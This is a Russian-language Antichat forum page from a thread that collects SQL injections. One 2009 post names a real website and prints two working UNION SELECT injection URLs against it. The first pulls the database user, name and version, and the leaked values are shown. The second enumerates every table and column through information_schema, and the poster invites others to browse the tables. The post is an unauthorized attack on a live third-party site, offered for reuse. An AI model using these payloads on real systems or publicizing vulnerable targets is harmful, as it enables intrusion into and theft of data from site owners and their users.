ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 09.03.2009, 02:39
Parserian
Новичок
Регистрация: 19.01.2009
Сообщений: 15
Провел на форуме:
31493

Репутация: 13
По умолчанию
http://www.gateway.uz
пр5, тиц 20

Код:
http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, concat_ws(0x3A3A, user(),database(),version())
uzdg@localhost::uzdg::5.0.32-Dotdeb_1.dotdeb.1-log


Код:
http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, group_concat( concat_ws( 0x3A3A, TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME ) SEPARATOR 0x3C62723E ) FROM information_schema.COLUMNS GROUP BY TABLE_SCHEMA, TABLE_NAME
доступ в information_schema, смотрите таблички наздоровье.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ